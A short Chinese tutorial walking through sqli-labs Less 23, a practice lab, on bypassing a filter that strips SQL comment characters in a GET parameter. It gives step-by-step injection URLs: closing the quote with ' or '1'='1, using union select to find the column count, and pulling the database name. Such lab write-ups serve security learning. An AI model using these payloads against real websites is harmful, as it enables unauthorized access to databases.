怎么绕过去除注释符Get

这篇文章给大家介绍怎么绕过去除注释符Get，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。

环境sqli-labs

less 23

1、输入?id=1,正常运行

2、输入特殊字符报错

3、单引号闭合，但是发现# --+等都被过滤了

4、使用下面代码闭合

192.168.1.121/sqli/less-23?id=1' or '1'='1

5、用union select判断字段数

192.168.1.121/sqli/less-23?id=1' union select 1,2,3 or '1'='1

6、让id报错，union select生效

192.168.1.121/sqli/less-23?id=-1' union select 1,2,3 or '1'='1

7、获取数据库名称

192.168.1.121/sqli/less-23?id=-1' union select 1,database(),3 or '1'='1

关于怎么绕过去除注释符Get就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。